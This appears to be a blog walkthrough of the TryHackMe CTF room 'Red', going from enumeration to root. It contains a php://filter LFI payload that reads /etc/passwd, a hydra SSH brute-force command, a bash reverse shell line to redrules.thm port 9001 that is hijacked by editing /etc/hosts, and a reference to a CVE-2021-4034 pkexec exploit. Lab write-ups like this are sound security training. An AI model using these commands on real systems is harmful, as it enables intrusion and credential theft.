In this page I’ll detail a walkthrough for the Easy machine Red from TryHackMe.
As usual, once the machine starts I began with an nmap scan.
└──╼ $sudo nmap -sS -sC -sV -p- 10.10.23.96 –open
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 12:19 EDT
Nmap scan report for 10.10.23.96
Host is up (0.092s latency).
Not shown: 65495 closed tcp ports (reset), 38 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to –defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2741ce0f7864d6946f65b4dbec39f76 (RSA)
| 256 fb8473da6cfeb9195a6c654dd1723bb0 (ECDSA)
|_ 256 5e3775fcb364e2d8d6bc9ae67e604d3c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Atlanta – Free business bootstrap template
|_Requested resource was /index.php?page=home.html
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.90 seconds
From here, we see that there are two ports open, 22 for SSH and 80 for HTTP. Seeing 80 as available, next I performed a dirb scan on that.
└──╼ $dirb http://10.10.23.96
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Mon Jul 17 12:21:34 2023
URL_BASE: http://10.10.23.96/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
—————–
GENERATED WORDS: 4612
—- Scanning URL: http://10.10.23.96/ —-
==> DIRECTORY: http://10.10.23.96/assets/
+ http://10.10.23.96/index.php (CODE:302|SIZE:0)
+ http://10.10.23.96/server-status (CODE:403|SIZE:276)
—- Entering directory: http://10.10.23.96/assets/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)
—————–
END_TIME: Mon Jul 17 12:28:14 2023
DOWNLOADED: 4612 – FOUND: 2
Not a whole lot here, so I ran another scan with gobuster.
└──╼ $gobuster dir -u http://10.10.23.96 -x html,xml,jsp,txt,asp,bak,php -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.23.96
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,asp,bak,php,html,xml,jsp
[+] Timeout: 10s
===============================================================
2023/07/17 12:29:07 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.txt (Status: 403) [Size: 276]
/.htpasswd.xml (Status: 403) [Size: 276]
/.htpasswd.jsp (Status: 403) [Size: 276]
/.htaccess.asp (Status: 403) [Size: 276]
/.htpasswd.txt (Status: 403) [Size: 276]
/.htaccess.bak (Status: 403) [Size: 276]
/.htpasswd.asp (Status: 403) [Size: 276]
/.htaccess.php (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd.bak (Status: 403) [Size: 276]
/.htaccess.html (Status: 403) [Size: 276]
/.htpasswd.php (Status: 403) [Size: 276]
/.htaccess.xml (Status: 403) [Size: 276]
/.htpasswd.html (Status: 403) [Size: 276]
/.htaccess.jsp (Status: 403) [Size: 276]
/about.html (Status: 200) [Size: 9309]
/assets (Status: 301) [Size: 311] [–> http://10.10.23.96/assets/]
/contact.html (Status: 200) [Size: 7507]
/home.html (Status: 200) [Size: 15757]
/index.php (Status: 302) [Size: 0] [–> /index.php?page=home.html]
/portfolio.html (Status: 200) [Size: 14352]
/readme.txt (Status: 200) [Size: 675]
/server-status (Status: 403) [Size: 276]
/services.html (Status: 200) [Size: 9131]
/signin.html (Status: 200) [Size: 6655]
/signup.html (Status: 200) [Size: 7283]
===============================================================
2023/07/17 12:52:40 Finished
===============================================================
What immediately stuck out here, is that index.php redirects to another local page called home.html. This made me think of an LFI vulnerability immediately. However, trying to get it to go directly to /etc/passwd for example wasn’t working. Instead, I tried to view local files using a php wrapper as shown below.
curl http://10.10.126.75/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
This returns the passwd file in base64 format. Once that’s decoded, I have the full /etc/passwd file.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
blue:x:1000:1000:blue:/home/blue:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
red:x:1001:1001::/home/red:/bin/bash
The big takeaway here is that there are two users, red and blue. After messing around attempting to find other files, I stumbled across this in /home/blue/.bash_history
echo “Red rules”
cd
hashcat –stdout .reminder -r /usr/share/hashcat/rules/best64.rule > passlist.txt
cat passlist.txt
rm passlist.txt
sudo apt-get remove hashcat -y
Included here is a command to generate a password list from a hidden .reminder file. Now that I know of its existence, I can also get the contents of this file, which is a password. I can then replicate the above command to generate my own password list. This can then be used with Hydra to bruteforce the password for blue’s ssh credentials.
hydra -l blue -P passlist.txt ssh://10.10.79.222
This will need to be done multiple times, as along with taunting red will kick you out and change the password after so long.
Once in, I wasn’t able to find anything until I ran ps -aux | grep red and saw the below:
red 15083 0.0 0.1 6972 2688 ? S 00:18 0:00 bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &
red 15431 0.0 0.1 6972 2488 ? S 00:19 0:00 bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &
From this, I can see that red is sending a reverse shell back on port 9001. I just have to redirect redrules.thm to my PC, (where I will have a netcat listener), by editing the /etc/hosts file.
echo ‘<MY IP> redrules.thm’ >> /etc/hosts
Once done, I wait for a few minutes and have a shell as red, which I promptly upgrade.
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
To escalate to root I wasn’t finding anything, except for a hidden .git folder in red’s home that only contained an old version of pkexec. As it turns out, this version is vulnerable to CVE-2021-4034.
I was able to find a python script on github to exploit this, all I had to do was modify the path to point to this version of pkexec in the python code. Once I transfered it to this machine and ran it, a root shell immediately popped up!